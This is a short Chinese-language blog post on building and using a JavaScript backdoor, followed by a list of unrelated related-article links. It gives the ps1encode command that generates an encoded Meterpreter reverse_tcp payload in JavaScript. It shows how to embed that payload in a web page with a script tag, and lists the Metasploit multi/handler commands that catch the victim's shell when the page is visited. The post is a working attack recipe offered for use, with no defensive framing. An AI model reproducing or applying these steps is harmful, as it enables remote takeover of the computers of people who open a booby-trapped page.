2. 程式人生 > 其它 >JavaScript後門建立與使⽤

JavaScript後門建立與使⽤

阿新 發佈:2021-11-30

JavaScript後門建立與使⽤

前言

  今天介紹一種小眾的js後門獲取shell,使用ps1encode來加密反彈後門。

  工具地址:https://github.com/CroweCybersecurity/ps1encode

正文

  在檔案目錄下用下面的命令生成反彈shell的js程式碼,填入監聽機的ip和port

./ps1encode.rb --LHOST [Port] --LPORT [Port] --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

  成功生成js程式碼

  將上面加密後的js程式碼儲存到一個.js的檔案中

  通過js語法,將剛剛儲存的js檔案內嵌到html中

<script src="u.js"></script>

  此時在msf中開啟監聽

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > set lhost 192.168.80.131
msf6 exploit(multi
 
/handler) > run
  當訪問帶有js的html⽹⻚時,kali成功獲取到會話

相關推薦

JavaScript後門建立使

JavaScript後門建立使⽤ 前言   今天介紹一種小眾的js後門獲取shell,使用ps1encode來加密反彈後門

建立框架無關的JavaScript外掛

JavaScript 中的外掛使我們能夠擴充套件語言,以實現所需的某些強大(或不夠強大)的功能。外掛/庫本質上是打包的程式碼,可以使我們免於一遍又一遍地編寫相同的東西(功能)。

JavaScript物件建立模式繼承

名稱空間模式 宣告依賴關係 私有化 模組模式 沙箱模式 靜態成員 鏈模式 程式碼複用繼承

python3.6連線MySQL和表的建立刪除例項程式碼

本文主要研究的是python3.6連線MySQL和表的建立刪除的相關內容,具體步驟和程式碼如下。

詳解numpy矩陣的建立資料型別

Numpy是python常用的一個類庫,在python的使用中及其常見,廣泛用在矩陣的計算中,numpy對矩陣的操作純python比起來速度有極大的差距。

Laravel5.1 框架模型建立使用方法例項分析

本文例項講述了Laravel5.1 框架模型建立使用方法。分享給大家供大家參考,具體如下:

詳解javascript中varES6規範中let、const區別用法

隨著ES6規範的到來,Js中定義變數的方法已經由單一的 var 方式發展到了 var、let、const 三種之多。var 眾所周知,可那倆新來的貨到底有啥新特性呢?到底該啥時候用呢?下面就是小編總結出的關於javascript中varES

JS自定義物件建立簡單使用方法示例

本文例項講述了JS自定義物件建立簡單使用方法。分享給大家供大家參考,具體如下:

Django3.0.3 版本--SQLite資料庫的建立資料庫基本操作

目錄   Django3.0.3 版本--SQLite資料庫的建立資料庫基本操作 資料庫建立相關 呼叫資料庫API

如何在JavaScript建立具有多個空格的字串?

通過建立變數 var a = \'something\' + \' \' + \'something\' 我得到這個值:\'something something\'。

yii框架建立設定預設控制器並載入模板操作示例

本文例項講述了yii框架建立設定預設控制器並載入模板操作。分享給大家供大家參考,具體如下:

JavaScript實現字串HTML格式相互轉換

程式碼:: 1.將字元轉換成Html function encodeHtml(str){ var encodedStr = \"\" ; if (str==\"\") return encodedStr ;

python3 deque 雙向佇列建立使用方法分析

本文例項講述了python3 deque 雙向佇列建立使用方法。分享給大家供大家參考,具體如下:

詳解ObjectARX開發環境的建立開發例項Hello World(VS2005+AutoCad2008+ObjectArx2008)

在一個做CAD二次開發的公司做Web開發,感覺可提升的空間很小。 有必要研究一下公司的產品開發,以利發展。

JavaScript 介面原理用法例項詳解

本文例項講述了JavaScript 介面原理用法。分享給大家供大家參考,具體如下:

mysql 觸發器建立使用方法示例

本文例項講述了mysql 觸發器建立使用方法。分享給大家供大家參考,具體如下:

微信小程式學習總結(一)專案建立目錄結構分析

本文例項講述了微信小程式專案建立目錄結構。分享給大家供大家參考,具體如下:

ASP.NET Swagger 建立漢化生成 API說明文件

1.首先引入下面兩個NuGet包 2.安裝完成後App_Start資料夾下出現SwaggerConfig.cs和SwaggerNet.cs

【Xamarin.Forms 1】App的建立執行

引言 本篇文章將從介紹Xamarin.Forms建立開始。 開發環境 Visual Studio 2019 16.6.2 Xamarin.Forms 4.6.0.726

File建立刪除

package demo01.File; import java.io.File; import java.io.IOException; /* File類建立刪除功能的方法